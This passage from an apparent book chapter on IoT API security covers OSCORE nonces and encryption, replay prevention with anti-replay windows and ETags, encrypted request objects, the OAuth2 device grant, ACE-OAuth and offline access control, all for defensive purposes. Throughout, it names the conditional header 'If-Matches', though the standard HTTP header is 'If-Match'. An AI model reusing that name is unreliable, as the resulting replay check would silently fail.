    // The Sender ID is an empty byte array, and the
    // Recipient ID is a single 1 byte.
    var senderId = new byte[0];
    var recipientId = new byte[] { 0x01 };
    // Derive the keys and Common IV.
    var senderKey = deriveKey(hkdfKey, senderId, null, algorithm);
    var recipientKey = deriveKey(hkdfKey, recipientId, null, algorithm);
    var commonIv = deriveCommonIV(hkdfKey, null, algorithm, 13);
}
GENERATING NONCES
The Common IV is not used directly to encrypt data because it is a fixed value, so
using it directly would immediately result in nonce reuse vulnerabilities. Instead,
the nonce is derived from a combination of the Common IV, the sequence number
(called the Partial IV), and the ID of the sender, as shown in listing 13.11. First
the sequence number is checked to make sure it fits in 5 bytes, and the Sender ID
is checked to ensure it will fit in the remainder of the IV. This puts significant
constraints on the maximum size of the Sender ID. A packed binary array is
generated consisting of the following items, in order:

■ The length of the Sender ID as a single byte
■ The Sender ID itself, left-padded with zero bytes until it is 6 bytes less than
  the total IV length
■ The sequence number encoded as a 5-byte big-endian integer
The resulting array is then combined with the Common IV using bitwise XOR, using
the following method:
private static byte[] xor(byte[] xs, byte[] ys) {
    // XOR each element of the second array (ys) into the
    // corresponding element of the first array (xs).
    for (int i = 0; i < xs.length; ++i)
        xs[i] ^= ys[i];
    // Return the updated result.
    return xs;
}
Add the xor() method and the nonce() method from listing 13.11 to the Oscore class.
NOTE   Although the generated nonce looks random due to being XORed with the
Common IV, it is in fact a deterministic counter that changes predictably as the
sequence number increases. The encoding is designed to reduce the risk of
accidental nonce reuse.
Listing 13.11   Deriving the per-message nonce

private static byte[] nonce(int ivLength, long sequenceNumber,
        byte[] id, byte[] commonIv) {
    // Check the sequence number is not too large
    // (2^40 - 1 is the largest value that fits in 5 bytes).
    if (sequenceNumber >= (1L << 40))
        throw new IllegalArgumentException(
                "Sequence number too large");
    // Check the Sender ID fits in the remaining space.
    int idLen = ivLength - 6;
    if (id.length > idLen)
        throw new IllegalArgumentException("ID is too large");
    // Encode the Sender ID length followed by the Sender ID,
    // left-padded to 6 less than the IV length.
    var buffer = ByteBuffer.allocate(ivLength).order(ByteOrder.BIG_ENDIAN);
    buffer.put((byte) id.length);
    buffer.put(new byte[idLen - id.length]);
    buffer.put(id);
    // Encode the sequence number as a 5-byte big-endian integer.
    buffer.put((byte) ((sequenceNumber >>> 32) & 0xFF));
    buffer.putInt((int) sequenceNumber);
    // XOR the result with the Common IV to derive the final nonce.
    return xor(buffer.array(), commonIv);
}
ENCRYPTING A MESSAGE
Once you’ve derived the per-message nonce, you can encrypt an OSCORE message, as
shown in listing 13.12, which is based on the example in section C.4 of the OSCORE
specification. OSCORE messages are encoded as COSE_Encrypt0 structures, in which
there is no explicit recipient information. The Partial IV and the Sender ID are
encoded into the message as unprotected headers, with the Sender ID using the
standard COSE Key ID (KID) header. Although marked as unprotected, those values are
actually authenticated because OSCORE requires them to be included in a COSE
external additional authenticated data structure, which is a CBOR array with the
following elements:

■ An OSCORE version number, currently always set to 1
■ The COSE algorithm identifier
■ The Sender ID
■ The Partial IV
■ An options string. This is used to encode CoAP headers but is blank in this
  example.
The COSE structure is then encrypted with the sender key.
DEFINITION   COSE allows messages to have external additional authenticated data,
which are included in the message authentication code (MAC) calculation but
not sent as part of the message itself. The recipient must be able to independently
recreate this external data, otherwise decryption will fail.
Listing 13.12   Encrypting the plaintext

// Generate the nonce and encode the Partial IV.
long sequenceNumber = 20L;
byte[] nonce = nonce(13, sequenceNumber, senderId, commonIv);
byte[] partialIv = new byte[] { (byte) sequenceNumber };

// Configure the algorithm and nonce.
var message = new Encrypt0Message();
message.addAttribute(HeaderKeys.Algorithm,
        algorithm.AsCBOR(), Attribute.DO_NOT_SEND);
message.addAttribute(HeaderKeys.IV,
        nonce, Attribute.DO_NOT_SEND);
// Set the Partial IV and Sender ID as unprotected headers.
message.addAttribute(HeaderKeys.PARTIAL_IV,
        partialIv, Attribute.UNPROTECTED);
message.addAttribute(HeaderKeys.KID,
        senderId, Attribute.UNPROTECTED);
// Set the content field to the plaintext to encrypt.
message.SetContent(
        new byte[] { 0x01, (byte) 0xb3, 0x74, 0x76, 0x31 });

// Encode the external associated data.
var associatedData = CBORObject.NewArray();
associatedData.Add(1);
associatedData.Add(algorithm.AsCBOR());
associatedData.Add(senderId);
associatedData.Add(partialIv);
associatedData.Add(new byte[0]);
message.setExternal(associatedData.EncodeToBytes());

// Ensure Bouncy Castle is loaded for AES-CCM support,
// then encrypt the message.
Security.addProvider(new BouncyCastleProvider());
message.encrypt(senderKey.getEncoded());
The encrypted message is then encoded into the application protocol, such as CoAP
or HTTP, and sent to the recipient. Details of this encoding are given in section 6
of the OSCORE specification. The recipient can recreate the nonce from its own
recipient security context, together with the Partial IV and Sender ID encoded into
the message.
The recipient is responsible for checking that the Partial IV has not been seen
before to prevent replay attacks. When OSCORE is transmitted over a reliable
protocol such as HTTP, this can be achieved by keeping track of the last Partial IV
received and ensuring that any new messages always use a larger number. For
unreliable protocols such as CoAP over UDP, where messages may arrive out of order,
you can use the algorithm from RFC 4303 (http://mng.bz/4BjV). This approach
maintains a window of allowed sequence numbers between a minimum and maximum value
that the recipient will accept and explicitly records which values in that range
have been received. If the recipient is a cluster of servers, such as a typical
cloud-hosted API, then this state must be synchronized between all servers to
prevent replay attacks. Alternatively, sticky load balancing can be used to ensure
requests from the same device are always delivered to the same server instance, as
shown in figure 13.5, but this can be
problematic in environments where servers are frequently added or removed. Section
13.2.2 discusses an alternative approach to preventing replay attacks that can be
effective for REST APIs.
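To make the windowed replay check concrete, the following is a minimal sketch of
an RFC 4303-style sliding window in Java. The AntiReplayWindow class name and the
64-entry window size are illustrative choices, and a real deployment would still
need to persist or synchronize this state as just described:

// A minimal sketch of an RFC 4303-style anti-replay window.
// It tracks the highest Partial IV seen and a bitmap of the
// WINDOW_SIZE values below it.
class AntiReplayWindow {
    private static final int WINDOW_SIZE = 64; // illustrative choice
    private long highest = -1;
    private long bitmap = 0;   // bit i set => (highest - i) was seen

    synchronized boolean checkAndUpdate(long partialIv) {
        if (partialIv > highest) {
            // A new highest value: slide the window forward.
            long shift = partialIv - highest;
            bitmap = (shift >= WINDOW_SIZE) ? 0 : bitmap << shift;
            bitmap |= 1;       // mark the new highest as seen
            highest = partialIv;
            return true;
        }
        long offset = highest - partialIv;
        if (offset >= WINDOW_SIZE) return false;  // too old: reject
        long bit = 1L << offset;
        if ((bitmap & bit) != 0) return false;    // replay: reject
        bitmap |= bit;                            // record as seen
        return true;
    }
}

A message is accepted only if checkAndUpdate returns true for its Partial IV.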
DEFINITION   Sticky load balancing is a setting supported by most load balancers
that ensures that API requests from a device or client are always delivered to the
same server instance. Although this can help with stateful connections, it can harm
scalability and is generally discouraged.
13.2.2 Avoiding replay in REST APIs
All solutions to message replay involve the client and server maintaining some
state. However, in some cases you can avoid the need for per-client state to
prevent replay. For example, requests that only read data are harmless if replayed,
so long as they do not require significant processing on the server and the
responses are kept confidential. Some requests that perform operations are also
harmless to replay if the request is idempotent.
DEFINITION   An operation is idempotent if performing it multiple times has the
same effect as performing it just once. Idempotent operations are important for
reliability because if a request fails because of a network error, the client can
safely retry it.
Figure 13.5   In sticky load balancing, all requests from one device are always
handled by the same server. This simplifies state management but reduces
scalability and can cause problems if that server restarts or is removed from the
cluster. (In normal load balancing, each request from a device can be sent to any
server, providing best use of resources; with sticky load balancing, all requests
from the same device always go to the same server.)
The HTTP specification requires the read-only methods GET, HEAD, and OPTIONS,
along with PUT and DELETE requests, to all be idempotent. Only the POST and
PATCH methods are not generally idempotent.
WARNING   Even if you stick to PUT requests instead of POST, this doesn’t mean that
your requests are always safe from replay.
The problem is that the definition of idempotency says nothing about what happens
if another request occurs in between the original request and the replay. For
example, suppose you send a PUT request updating a page on a website, but you lose
your network connection and do not know if the request succeeded or not. Because
the request is idempotent, you send it again. Unknown to you, one of your
colleagues in the meantime sent a DELETE request because the document contained
sensitive information that shouldn’t have been published. Your replayed PUT request
arrives afterwards, and the document is resurrected, sensitive data and all. An
attacker can replay requests to restore an old version of a resource, even though
all the operations were individually idempotent.
Thankfully, there are several mechanisms you can use to ensure that no other
request has occurred in the meantime. Many updates to a resource follow the pattern
of first reading the current version and then sending an updated version. You can
ensure that nobody has changed the resource since you read it using one of two
standard HTTP mechanisms:
■ The server can return a Last-Modified header when reading a resource that
  indicates the date and time when it was last modified. The client can then send
  an If-Unmodified-Since header in its update request with the same timestamp. If
  the resource has changed in the meantime, then the request will be rejected
  with a 412 Precondition Failed status.2 The main downside of Last-Modified
  headers is that they are limited to the nearest second, so are unable to detect
  changes occurring more frequently.
■ Alternatively, the server can return an ETag (Entity Tag) header that should
  change whenever the resource changes, as shown in figure 13.6. Typically, the
  ETag is either a version number or a cryptographic hash of the contents of the
  resource. The client can then send an If-Matches header containing the expected
  ETag when it performs an update. If the resource has changed in the meantime,
  then the ETag will be different and the server will respond with a 412 status
  code and reject the request.
WARNING   Although a cryptographic hash can be appealing as an ETag, it does mean
that the ETag will revert to a previous value if the content does. This allows an
attacker to replay any old requests with a matching ETag. You can prevent this by
including a counter or timestamp in the ETag calculation so that the ETag is always
different even if the content is the same.

2 If the server can determine that the current state of the resource happens to
match the requested state, then it can also return a success status code as if the
request succeeded. But in that case the request is really idempotent anyway.
Listing 13.13 shows an example of updating a resource using a simple monotonic
counter as the ETag. In this case, you can use an AtomicInteger class to hold the
current ETag value, using the atomic compareAndSet method to increment the value if
the If-Matches header in the request matches the current value. Alternatively, you
could store the ETag values for resources in the database alongside the data for a
resource and update them in a transaction. If the If-Matches header in the request
doesn’t match the current value, then a 412 Precondition Failed response is
returned; otherwise, the resource is updated and a new ETag is returned.
Figure 13.6   A client can prevent replay of authenticated request objects by
including an If-Matches header with the expected ETag of the resource. The update
will modify the resource and cause the ETag to change, so if an attacker tries to
replay the request, it will fail with a 412 Precondition Failed error. (The client
sends a request including the expected ETag in the If-Matches header; when the
attacker tries to replay the captured request, it fails because the ETag no longer
matches.)
Listing 13.13   Using ETags to prevent replay

var etag = new AtomicInteger(42);

put("/test", (request, response) -> {
    // Check the current ETag matches the one in the request.
    var expectedEtag = parseInt(request.headers("If-Matches"));
    if (!etag.compareAndSet(expectedEtag, expectedEtag + 1)) {
        // If not, return a 412 Precondition Failed response.
        response.status(412);
        return null;
    }
    System.out.println("Updating resource with new content: " +
            request.body());
    // Otherwise, return the new ETag after updating the resource.
    response.status(200);
    response.header("ETag", String.valueOf(expectedEtag + 1));
    response.type("text/plain");
    return "OK";
});
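For example, with the Spark server from listing 13.13 running on its default port
(4567), a client update and a subsequent replay might look like the following:

# The first update succeeds and returns the new ETag (43)
curl -i -X PUT -H 'If-Matches: 42' -d 'new content' \
  http://localhost:4567/test

# Replaying the same request fails with 412 Precondition Failed,
# because the current ETag is now 43
curl -i -X PUT -H 'If-Matches: 42' -d 'new content' \
  http://localhost:4567/test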
The ETag mechanism can also be used to prevent replay of a PUT request that is
intended to create a resource that doesn’t yet exist. Because the resource doesn’t
exist, there is no existing ETag or Last-Modified date to include. An attacker
could replay this message to overwrite a later version of the resource with the
original content. To prevent this, you can include an If-None-Match header with the
special value *, which tells the server to reject the request if there is any
existing version of this resource at all.
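Such a create request might look like the following (the URL is illustrative, and
the server-side handling of If-None-Match is not shown in listing 13.13):

# Create the resource only if no version of it already exists
curl -i -X PUT -H 'If-None-Match: *' -d 'initial content' \
  http://localhost:4567/test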
TIP   The Constrained Application Protocol (CoAP), often used for implementing
REST APIs in constrained environments, doesn’t support the Last-Modified or
If-Unmodified-Since headers, but it does support ETags along with If-Matches and
If-None-Match. In CoAP, headers are known as options.
ENCODING HEADERS WITH END-TO-END SECURITY
As explained in chapter 12, in an end-to-end IoT application, a device may not be
able to talk to the API directly over HTTP (or CoAP) but must instead pass an
authenticated message through multiple intermediate proxies. Even if each proxy
supports HTTP, the client may not trust those proxies not to interfere with the
message if there isn’t an end-to-end TLS connection. The solution is to encode the
HTTP headers along with the request data into an encrypted request object, as shown
in listing 13.14.
DEFINITION   A request object is an API request that is encapsulated as a single
data object that can be encrypted and authenticated as one element. The request
object captures the data in the request as well as headers and other metadata
required by the request.
In this example, the headers are encoded as a CBOR map, which is then combined
with the request body and an indication of the expected HTTP method to create the
overall request object. The entire object is then encrypted and authenticated using
NaCl’s CryptoBox functionality. OSCORE, discussed in section 13.1.4, is an example
of an end-to-end protocol using request objects. The request objects in OSCORE are
CoAP messages encrypted with COSE.
TIP   Full source code for this example is provided in the GitHub repository
accompanying the book at http://mng.bz/QxWj.
Listing 13.14   Encoding HTTP headers into a request object

var revisionEtag = "42";
// Encode any required HTTP headers into CBOR.
var headers = CBORObject.NewMap()
        .Add("If-Matches", revisionEtag);
var body = CBORObject.NewMap()
        .Add("foo", "bar")
        .Add("data", 12345);
// Encode the headers and body, along with the HTTP method,
// as a single object.
var request = CBORObject.NewMap()
        .Add("method", "PUT")
        .Add("headers", headers)
        .Add("body", body);
// Encrypt and authenticate the entire request object.
var sent = CryptoBox.encrypt(clientKeys.getPrivate(),
        serverKeys.getPublic(), request.EncodeToBytes());
To validate the request, the API server should decrypt the request object and then
verify that the headers and HTTP request method match those specified in the
object. If they don’t match, then the request should be rejected as invalid.
CAUTION   You should always ensure the actual HTTP request headers match the
request object rather than replacing them. Otherwise, an attacker can use the
request object to bypass security filtering performed by Web Application Firewalls
and other security controls. You should never let a request object change the HTTP
method because many security checks in web browsers rely on it.
Listing 13.15 shows how to validate a request object in a filter for the Spark HTTP
framework you’ve used in earlier chapters. The request object is decrypted using
NaCl. Because this is authenticated encryption, the decryption process will fail if
the request has been faked or tampered with. You should then verify that the HTTP
method of the request matches the method included in the request object, and that
any headers listed in the request object are present with the expected values. If
any details don’t match, then you should reject the request with an appropriate
error code and message. Finally, if all checks pass, then you can store the
decrypted request body in an attribute so that it can easily be retrieved without
having to decrypt the message again.
Listing 13.15   Validating a request object

before((request, response) -> {
    // Decrypt the request object and decode it.
    var encryptedRequest = CryptoBox.fromString(request.body());
    var decrypted = encryptedRequest.decrypt(
            serverKeys.getPrivate(), clientKeys.getPublic());
    var cbor = CBORObject.DecodeFromBytes(decrypted);
    // Check that the HTTP method matches the request object.
    if (!cbor.get("method").AsString()
            .equals(request.requestMethod())) {
        halt(403);
    }
    // Check that any headers in the request object
    // have their expected values.
    var expectedHeaders = cbor.get("headers");
    for (var headerName : expectedHeaders.getKeys()) {
        if (!expectedHeaders.get(headerName).AsString()
                .equals(request.headers(headerName.AsString()))) {
            halt(403);
        }
    }
    // If all checks pass, then store the decrypted request body.
    request.attribute("decryptedRequest", cbor.get("body"));
});
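A route can then work with the decrypted body directly. Here is a minimal sketch,
assuming the same Spark framework and an illustrative /test endpoint:

put("/test", (request, response) -> {
    // The before() filter has already decrypted and validated the
    // request object, so just retrieve the stored body.
    CBORObject body = request.attribute("decryptedRequest");
    System.out.println("Decrypted request body: " + body);
    response.status(200);
    return "OK";
});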
Pop quiz

3  Entity authentication requires which additional property on top of message
   authentication?
   a  Fuzziness
   b  Friskiness
   c  Funkiness
   d  Freshness
4  Which of the following are ways of ensuring authentication freshness? (There
   are multiple correct answers.)
   a  Deodorant
   b  Timestamps
   c  Unique nonces
   d  Challenge-response protocols
   e  Message authentication codes
5  Which HTTP header is used to ensure that the ETag of a resource matches an
   expected value?
   a  If-Matches
   b  Cache-Control
   c  If-None-Matches
   d  If-Unmodified-Since
The answers are at the end of the chapter.

13.3 OAuth2 for constrained environments
Throughout this book, OAuth2 has cropped up repeatedly as a common approach to
securing APIs in many different environments. What started as a way to do delegated
authorization in traditional web applications has expanded to encompass mobile
apps, service-to-service APIs, and microservices. It should therefore come as
little surprise that it is also being applied to securing APIs in the IoT. It’s
especially suited to consumer IoT applications in the home. For example, a smart TV
may allow users to log in to streaming services to watch films or listen to music,
or to view updates from social media streams. These are well suited to OAuth2,
because they involve a human delegating part of their authority to a device for a
well-defined purpose.
DEFINITION   A smart TV (or connected TV) is a television that is capable of
accessing services over the internet, such as music or video streaming or social
media APIs. Many other home entertainment devices are also now capable of accessing
the internet, and APIs are powering this transformation.
But the traditional approaches to obtaining authorization can be difficult to use
in an IoT environment for several reasons:

■ The device may lack a screen, keyboard, or other capabilities needed to let a
  user interact with the authorization server to approve consent. Even on a more
  capable device such as a smart TV, typing in long usernames or passwords on a
  small remote control can be time-consuming and annoying for users. Section
  13.3.1 discusses the device authorization grant that aims to solve this
  problem.
■ Token formats and security mechanisms used by authorization servers are often
  heavily focused on web browser clients or mobile apps and are not suitable for
  more constrained devices. The ACE-OAuth framework discussed in section 13.3.2
  is an attempt to adapt OAuth2 for such constrained environments.
DEFINITION   ACE-OAuth (Authorization for Constrained Environments using OAuth2) is
a framework specification that adapts OAuth2 for constrained devices.
13.3.1 The device authorization grant
The OAuth2 device authorization grant (RFC 8628, https://tools.ietf.org/html/
rfc8628) allows devices that lack normal input and output capabilities to obtain
access tokens from users. In the normal OAuth2 flows discussed in chapter 7, the
OAuth2 client would redirect the user to a web page on the authorization server
(AS), where they can log in and approve access. This is not possible on many IoT
devices because they have no display to show a web browser, and no keyboard, mouse,
or touchscreen to let the user enter their details. The device authorization grant,
or device flow as it is often called, solves this problem by letting the user
complete the authorization on a second device, such as a laptop or mobile phone.
Figure 13.7 shows the overall flow, which is described in more detail in the rest
of this section.
To initiate the flow, the device first makes a POST request to a new device
authorization endpoint at the AS, indicating the scope of the access token it
requires and authenticating using its client credentials. The AS returns three
details in the response (an example response is shown after the following list):
■ A device code, which is a bit like an authorization code from chapter 7 and
  will eventually be exchanged for an access token after the user authorizes the
  request. This is typically an unguessable random string.
■ A user code, which is a shorter code designed to be manually entered by the
  user when they approve the authorization request.
■ A verification URI where the user should go to type in the user code to approve
  the request. This will typically be a short URI if the user will have to
  manually type it in on another device.
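For example, the response might look like the following (an illustrative response
in the style of RFC 8628; exact values will vary by AS):

{
  "device_code": "GmRhmhcxhwAzkoEqiMEg_DnyEysNkuNhszIySk9eS",
  "user_code": "WDJB-MJHT",
  "verification_uri": "https://as.example.com/device",
  "expires_in": 1800,
  "interval": 5
}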
Figure 13.7   In the OAuth2 device authorization grant, the device first calls an
endpoint on the AS to start the flow and receives a device code and short user
code. The device asks the user to navigate to the AS on a separate device, such as
a smartphone. After the user authenticates, they type in the user code and approve
the request. The device polls the AS in the background using the device code until
the flow completes. If the user approved the request, then the device receives an
access token the next time it polls the AS.

Listing 13.16 shows how to begin a device grant authorization request from Java. In
this example, the device is a public client and so you only need to supply the
client_id and scope parameters on the request. If your device is a confidential
client, then you would also need to supply client credentials using HTTP Basic
authentication or another client authentication method supported by your AS. The
parameters are URL-encoded as they are for other OAuth2 requests. The AS returns a
200 OK response if the request is successful, with the device code, user code, and
verification URI in JSON format. Navigate to src/main/java/com/manning/
apisecurityinaction and create a new file named DeviceGrantClient.java. Create a
new public class in the file with the same name and add the method from listing
13.16 to the file. You’ll need the following imports at the top of the file:
import org.json.JSONObject;
import java.net.*;
import java.net.http.*;
import java.net.http.HttpRequest.BodyPublishers;
import java.net.http.HttpResponse.BodyHandlers;
import java.util.concurrent.TimeUnit;
import static java.nio.charset.StandardCharsets.UTF_8;
Listing 13.16   Starting a device authorization grant flow

private static final HttpClient httpClient = HttpClient.newHttpClient();

private static JSONObject beginDeviceAuthorization(
        String clientId, String scope) throws Exception {
    // Encode the client ID and scope as form parameters and POST
    // them to the device authorization endpoint.
    var form = "client_id=" + URLEncoder.encode(clientId, UTF_8) +
            "&scope=" + URLEncoder.encode(scope, UTF_8);
    var request = HttpRequest.newBuilder()
            .header("Content-Type",
                    "application/x-www-form-urlencoded")
            .uri(URI.create(
                    "https://as.example.com/device_authorization"))
            .POST(BodyPublishers.ofString(form))
            .build();
    var response = httpClient.send(request, BodyHandlers.ofString());
    // If the response is not 200 OK, then an error occurred.
    if (response.statusCode() != 200) {
        throw new RuntimeException("Bad response from AS: " +
                response.body());
    }
    // Otherwise, parse the response as JSON.
    return new JSONObject(response.body());
}
The device that initiated the flow communicates the verification URI and user code
to the user but keeps the device code secret. For example, the device might be able
to display a QR code (figure 13.8) that the user can scan on their phone to open
the verification URI, or the device might communicate directly with the user’s
phone over a local Bluetooth connection. To approve the authorization, the user
opens the verification URI on their other device and logs in. They then type in the
user code and can either approve or deny the request after seeing details of the
scopes requested.

Figure 13.8   A QR code is a way to encode a URI that can be easily scanned by a
mobile phone with a camera. This can be used to display the verification URI used
in the OAuth2 device authorization grant. If you scan this QR code on your phone,
it will take you to the home page for this book.
TIP   The AS may also return a verification_uri_complete field that combines the
verification URI with the user code. This allows the user to just follow the link
without needing to manually type in the code.
The original device that requested authorization is not notified that the flow has
completed. Instead, it must periodically poll the access token endpoint at the AS,
passing in the device code it received in the initial request as shown in listing
13.17. This is the same access token endpoint used in the other OAuth2 grant types
discussed in chapter 7, but you set the grant_type parameter to

urn:ietf:params:oauth:grant-type:device_code

to indicate that the device authorization grant is being used. The client also
includes its client ID and the device code itself. If the client is confidential,
it must also authenticate using its client credentials, but this example is using a
public client. Open the DeviceGrantClient.java file again and add the method from
the following listing.
Listing 13.17   Checking status of the authorization request

private static JSONObject pollAccessTokenEndpoint(
        String clientId, String deviceCode) throws Exception {
    // Encode the client ID and device code along with the
    // device_code grant type URI.
    var form = "client_id=" + URLEncoder.encode(clientId, UTF_8) +
            "&grant_type=urn:ietf:params:oauth:grant-type:device_code" +
            "&device_code=" + URLEncoder.encode(deviceCode, UTF_8);
    // Post the parameters to the access token endpoint at the AS.
    var request = HttpRequest.newBuilder()
            .header("Content-Type",
                    "application/x-www-form-urlencoded")
            .uri(URI.create("https://as.example.com/access_token"))
            .POST(BodyPublishers.ofString(form))
            .build();
    var response = httpClient.send(request, BodyHandlers.ofString());
    // Parse the response as JSON.
    return new JSONObject(response.body());
}
If the user has already approved the request, then the AS will return an access
token, optional refresh token, and other details as it does for other access token
requests you learned about in chapter 7. Otherwise, the AS returns one of the
following status codes:

■ authorization_pending indicates that the user hasn’t yet approved or denied
  the request and the device should try again later.
■ slow_down indicates that the device is polling the authorization endpoint too
  frequently and should increase the interval between requests by 5 seconds. An
  AS may revoke authorization if the device ignores this code and continues to
  poll too frequently.
■ access_denied indicates that the user refused the request.
■ expired_token indicates that the device code has expired without the request
  being approved or denied. The device will have to initiate a new flow to
  obtain a new device code and user code.
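These codes are returned in the error field of a standard OAuth2 error response
with a 400 status, for example (illustrative, per RFC 8628):

{
  "error": "authorization_pending"
}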
Listing 13.18 shows how to handle the full authorization flow in the client,
building on the previous methods. Open the DeviceGrantClient.java file again and
add the main method from the listing.
TIP   If you want to test the client, the ForgeRock Access Management (AM) product
supports the device authorization grant. Follow the instructions in appendix A to
set up the server and then the instructions in http://mng.bz/X0W6 to configure the
device authorization grant. AM implements an older draft version of the standard
and requires an extra response_type=device_code parameter on the initial request
to begin the flow.
Listing 13.18   The full device authorization grant flow

public static void main(String... args) throws Exception {
    var clientId = "deviceGrantTest";
    var scope = "a b c";

    // Start the authorization process and store the
    // device code and poll interval.
    var json = beginDeviceAuthorization(clientId, scope);
    var deviceCode = json.getString("device_code");
    var interval = json.optInt("interval", 5);

    // Display the verification URI and user code to the user.
    System.out.println("Please open " +
            json.getString("verification_uri"));
    System.out.println("And enter code:\n\t" +
            json.getString("user_code"));

    // Poll the access token endpoint with the device code
    // according to the poll interval.
    while (true) {
        Thread.sleep(TimeUnit.SECONDS.toMillis(interval));
        json = pollAccessTokenEndpoint(clientId, deviceCode);

        var error = json.optString("error", null);
        if (error != null) {
            switch (error) {
                case "slow_down":
                    // If the AS tells you to slow down, then
                    // increase the poll interval by 5 seconds.
                    System.out.println("Slowing down");
                    interval += 5;
                    break;
                case "authorization_pending":
                    // Otherwise, keep waiting until a response
                    // is received.
                    System.out.println("Still waiting!");
                    break;
                default:
                    System.err.println("Authorization failed: " + error);
                    System.exit(1);
                    break;
            }
        } else {
            // The AS will return an access token when the
            // authorization is complete.
            System.out.println("Access token: " +
                    json.getString("access_token"));
            break;
        }
    }
}
13.3.2 ACE-OAuth
The Authorization for Constrained Environments (ACE) working group at the IETF is
working to adapt OAuth2 for IoT applications. The main output of this group is the
definition of the ACE-OAuth framework (http://mng.bz/yr4q), which describes how to
perform OAuth2 authorization requests over CoAP instead of HTTP, using CBOR instead
of JSON for requests and responses. COSE is used as a standard format for access
tokens and can also be used as a proof-of-possession (PoP) scheme to secure tokens
against theft (see section 11.4.6 for a discussion of PoP tokens). COSE can also be
used to protect API requests and responses themselves, using the OSCORE framework
you saw in section 13.1.4.
At the time of writing, the ACE-OAuth specifications are still under development
but are approaching publication as standards. The main framework describes how to
adapt OAuth2 requests and responses to use CBOR, including support for the
authorization code, client credentials, and refresh token grants.3 The token
introspection endpoint is also supported, using CBOR over CoAP, providing a
standard way for resource servers to check the status of an access token.
Unlike the original OAuth2, which used bearer tokens exclusively and has only
recently started supporting proof-of-possession (PoP) tokens, ACE-OAuth has been
designed around PoP from the start. Issued access tokens are bound to a
cryptographic key and can only be used by a client that can prove possession of
this key. This can be accomplished with either symmetric or public key
cryptography, providing support for a wide range of device capabilities. APIs can
discover the key associated with a device either through token introspection or by
examining the access token itself, which is typically in CWT format. When public
key cryptography is used, the token will contain the public key of the client,
while for symmetric key cryptography, the secret key will be present in
COSE-encrypted form, as described in RFC 8747
(https://datatracker.ietf.org/doc/html/rfc8747).
3 Strangely, the device authorization grant is not yet supported.
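To illustrate the shape of such a token, here is a sketch of CWT claims in CBOR
diagnostic notation, assuming the integer claim labels from RFC 8392 (iss = 1,
aud = 3, exp = 4) and RFC 8747 (cnf = 8, with COSE_Key = 1); the key bytes and
issuer/audience values are placeholders:

{
  1: "as.example.com",          / iss /
  3: "coaps://device.example",  / aud /
  4: 1711929600,                / exp /
  8: {                          / cnf /
    1: {                        / COSE_Key /
      1: 4,                     / kty: Symmetric /
      -1: h'6684523ab17337f173500e5728c628547cb37afe'  / k: the PoP key /
    }
  }
}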
13.4 Offline access control
Many IoT applications involve devices operating in environments where they may not
have a permanent or reliable connection to central authorization services. For
example, a connected car may be driven through long tunnels or to remote locations
where there is no signal. Other devices may have limited battery power and so want
to avoid making frequent network requests. It’s usually not acceptable for a device
to completely stop functioning in this case, so you need a way to perform security
checks while the device is disconnected. This is known as offline authorization.
Offline authorization allows devices to continue accepting and producing API
requests to other local devices and users until the connection is restored.
DEFINITION   Offline authorization allows a device to make local security decisions
when it is disconnected from a central authorization server.
Allowing offline authorization often comes with increased risks. For example, if a
device can’t check with an OAuth2 authorization server whether an access token is
valid, then it may accept a token that has been revoked. This risk must be balanced
against the costs of downtime if devices are offline, and the appropriate level of
risk determined for your application. You may want to apply limits to what
operations can be performed in offline mode or enforce a time limit for how long
devices will operate in a disconnected state.
13.4.1 Offline user authentication
Some devices may never need to interact with a user at all, but for some IoT
applications this is a primary concern. For example, many companies now operate
smart lockers where goods ordered online can be delivered for later collection. The
user arrives at a later time and uses an app on their smartphone to send a request
to open the locker. Devices used in industrial IoT deployments may work
autonomously most of the time but occasionally need servicing by a human
technician. It would be frustrating for the user if they couldn’t get their latest
purchase because the locker can’t connect to a cloud service to authenticate them,
and a technician is often only involved when something has gone wrong, so you
shouldn’t assume that network services will be available in this situation.
The solution is to make user credentials available to the device so that it can
locally authenticate the user. This doesn’t mean that the user’s password hash
should be transmitted to the device, because this would be very dangerous: an
attacker that intercepted the hash could perform an offline dictionary attack to
try to recover the password. Even worse, if the attacker compromised the device,
then they could just intercept the password directly as the user types it. Instead,
the credential should be short-lived and limited to just the operations needed to
access that device. For example, a user can be sent a one-time code that they can
display on their smartphone as a QR code that the smart locker can scan. The same
code is hashed and sent to the device, which can then compare the hash to the QR
code and, if they match, it opens the locker, as shown in figure 13.9.
Figure 13.9   One-time codes can be periodically sent to an IoT device such as a
secure locker. A secure hash of the code is stored locally, allowing the locker to
authenticate users even if it cannot contact the cloud service at that time. (When
the user orders goods for collection, they are given a one-time code, and a secure
hash of the code and details of the delivery are transmitted to the locker. The
user’s phone displays the code as a QR code that is scanned by the locker. If the
code matches the hash, then the locker is unlocked and the code deleted.)

For this approach to work, the device must be online periodically to download new
credentials. A signed, self-contained token format can overcome this problem.
Before leaving to service a device in the field, the technician can authenticate to
a central authorization server and receive an OAuth2 access token or OpenID Connect
ID token. This token can include a public key or a temporary credential that can be
used to locally authenticate the user. For example, the token can be bound to a TLS
client certificate as described in chapter 11, or to a key using the CWT PoP tokens
mentioned in section 13.3.2. When the technician arrives to service the device,
they can present the access token to access device APIs over a local connection,
such as Bluetooth Low-Energy (BLE). The device API can verify the signature on the
access token and check the scope, issuer, audience, expiry time, and other details.
If the token is valid, then the embedded credentials can be used to authenticate
the user locally to allow access according to the conditions attached to the token.
13.4.2 Offline authorization
Offline authentication solves the problem of identifying users without a direct
connection to a central authentication service. In many cases, device access
control decisions are simple enough to be hard-coded based on pre-existing trust
relationships. For example, a device may allow full access to any user that has a
credential issued by a trusted source and deny access to everybody else. But not
all access control policies are so simple, and access may depend on a range of
dynamic factors and changing conditions. Updating complex policies for individual
devices becomes difficult as the number of devices grows. As you learned in
chapter 8, access control policies can be centralized using a policy engine that is
accessed via its own API. This simplifies management of device policies, but again
can lead to problems if the device is offline.
The solutions are similar to the solutions to offline authentication described in
the last section. The most basic solution is for the device to periodically
download the latest policies in a standard format such as XACML, discussed in
chapter 8. The device can then make local access control decisions according to the
policies. XACML is a complex XML-based format, so you may want to consider a more
lightweight policy language encoded in CBOR or another compact format, but I am not
aware of any standards for such a language.
Self-contained access token formats can also be used to permit offline
authorization. A simple example is the scope included in an access token, which
allows an offline device to determine which API operations a client should be
allowed to call. More complex conditions can be encoded as caveats using the
macaroon token format discussed in chapter 9. Suppose that you used your smartphone
to book a rental car. An access token in macaroon format is sent to your phone,
allowing you to unlock the car by transmitting the token to the car over BLE, just
like in the example at the end of section 13.4.1. You later drive the car to an
